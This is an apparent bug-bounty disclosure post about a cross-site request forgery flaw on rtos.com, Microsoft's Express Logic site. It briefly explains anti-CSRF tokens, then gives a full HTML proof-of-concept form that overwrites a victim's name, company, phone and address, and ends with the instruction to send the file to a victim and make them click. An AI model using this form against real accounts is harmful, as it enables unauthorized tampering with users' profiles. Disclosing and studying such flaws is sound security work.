Cross Site Request Forgery vulnerability Leads to User Profile Change in Microsoft Express Logic

Adesh Kolte
Jan 21 · 2 min read

Basic Cross Site Request Forgery

CSRF (Cross site request forgery) is the vulnerability that tricks the user to submit the malicious request if there is no implementation of the Anti-CSRF tokens in the forms or site. When implemented your website https://example.com will include a random generated number or token to every page which is impossible to guess by the attacker so https://example.com will include it when they serve it to you. It differs each time they serve any page to anybody so attacker won’t be able to generate a valid request because of the wrong token.

Affected Product: https://rtos.com

Allows an attacker to change one’s account information in this case ie information from “Name ”. Attackers can change the information without having to login to victim account or without having to login but only by using CSRF technique. Also change the (Victim) users profile ,company name,position ,phone number,website,country,postal all profile information can be changed

using the Script

<html>
<! — CSRF PoC — →
<body>
<script>CSRF</script>
<form action=”https://rtos.com/wp-admin/admin-ajax.php" method=”POST”>
<input type=”hidden” name=”first&#95;name” value=” attacker “ />
<input type=”hidden” name=”last&#95;name” value=” attacker “ />
<input type=”hidden” name=”company” value=”attacker” />
<input type=”hidden” name=”position” value=”Co&#45;f attacker r” />
<input type=”hidden” name=”phone” value=”123324123" />
<input type=”hidden” name=”website” value=”http&#58;&#47;&#47;adeshkolte&#46;com” />
<input type=”hidden” name=”country” value=”IN” />
<input type=”hidden” name=”address” value=”Pune&#32;” />
<input type=”hidden” name=”address2" value=”Pune” />
<input type=”hidden” name=”city” value=”Pune&#32;” />
<input type=”hidden” name=”state” value=”” />
<input type=”hidden” name=”region” value=”Maharashtra&#32;” />
<input type=”hidden” name=”zip” value=”443112" />
<input type=”hidden” name=”action” value=”account&#95;personal” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

save it as csrf.html Send the script to the victim nd make them click

Got Hall Of Fame https://portal.msrc.microsoft.com/en-us/security-guidance/researcher-acknowledgments-online-services?rtc=1

Thanks For Reading

    Adesh Kolte

    Written by

    Listed in Top 100 most respected hackers in the world by Microsoft at the BlackHat conference in America 2018

    Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
    Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
    Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade